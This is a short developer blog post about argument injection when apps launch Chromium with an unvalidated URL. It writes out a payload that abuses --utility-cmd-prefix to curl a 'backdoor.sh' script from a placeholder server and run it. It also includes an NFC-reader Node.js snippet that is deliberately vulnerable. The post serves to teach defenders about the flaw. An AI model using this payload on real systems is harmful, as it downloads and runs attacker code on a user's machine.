Do not run chrome from your app!

Published: May 1, 2022 by nemanjan00

This is example how your user can be hacked if you misuse chromium to open web links.

Attack

What I have seen people do is something like this:

url = "someurl"; // this is just pseudo-code
execlp("chromium", "chromium", url);

What that does is it runs this:

chromium someurl

And if they get something like this as parameter:

url = `--utility-cmd-prefix='bash -c \" ls . ; curl http://someserver/backdoor.sh > backdoor.sh ; bash backdoor.sh ; ls . \"'`

What happens is user just got compromised…

chromium --utility-cmd-prefix='bash -c \" ls . ; curl http://someserver/backdoor.sh > backdoor.sh ; bash backdoor.sh ; ls . \"'

To understand how big of issue this is I suggest reading my post about command arguments.

Real danger example 1 (NFC/QRcode)

Now imagine you have just implemented NFC or QRcode reader…

You did not check url format, you passed it to chromium as url…

Example vulnerable code:

const { spawn } = require("child_process");
const fs = require("fs");
const ndefLibrary = require('ndef-lib');

spawn("nfc-mfultralight", ["r", "dump"]).on("close", () => {
	const data = fs.readFileSync("./dump").slice(18);

	const message = new ndefLibrary.NdefMessage.fromByteArray(data);

	const url = Buffer.from(message._records[0]._payload).toString("utf8").slice(2);

	const shell = spawn("chromium", [url]);

	shell.stdout.on("data", data => {
		console.log("" + data);
	});

	shell.stderr.on("data", data => {
		console.error("" + data);
	});

	shell.on("close", (code) => {
		console.log(code);
	});
});

Real danger example 2 (RSS reader/Mail client)

What happens if you want to open link you just took from XML or JSON and you trust it is valid link?

You just pass it to chromium?

Share

Latest Posts

How to print all rejections in NodeJS
How to print all rejections in NodeJS

Did you forget to print error on rejection, in a huge project and are now having issues debugging it? I wrote a snippet of code to solve that.

Why argv sucks for users
Why argv sucks for users

There are some conventions and patterns that are part of so much software we are never getting rid of them. One of those conventions defines how we pass arguments to applications.

Do not run chrome from your app!
Do not run chrome from your app!

This is example how your user can be hacked if you misuse chromium to open web links.